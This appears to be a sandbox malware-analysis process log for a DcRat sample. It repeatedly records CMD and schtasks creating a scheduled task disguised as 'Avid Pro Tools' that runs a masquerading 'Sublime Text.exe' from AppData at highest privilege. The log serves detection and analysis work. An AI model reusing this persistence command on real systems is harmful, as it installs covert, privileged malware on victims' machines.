C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1884
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2160
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2548
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:560
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2724
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1832
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2488
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1748
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2332
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2432
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2384
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2976
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2468
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2588
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2236
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2168
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:552
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1224
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2244
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2192
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:856
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1856
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1060
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2136
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1936
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1892
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2124
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2884
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2348
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1712
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2944
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2972
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1492
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2092
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2836
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2680
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1004
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2548
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2460
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2132
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2216
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1364
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3032
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2320
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1712
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2396
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:620
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:408
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2340
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2200
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1840
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2528
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3020
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:940
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2152
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:824
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:156
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2188
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2468
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1296
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2940
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1952
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1864
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3032
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1316
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1668
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:620
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1168
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1828
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2676
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:108
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2328
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2948
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1668
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1052
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1608
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1724
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2148
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2092
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1864
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2400
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1940
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2744
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3020
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3052
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1952
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1160
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2488
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2676
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1364
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2788
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1320
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:292
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1576
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1512
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2232
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1008
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:824
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1148
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1916
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2088
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:952
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2416
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:448
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2364
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2592
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1428
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1948
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2572
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1436
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1688
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2660
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1936
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1052
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2956
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1200
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2584
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:156
-
-
-
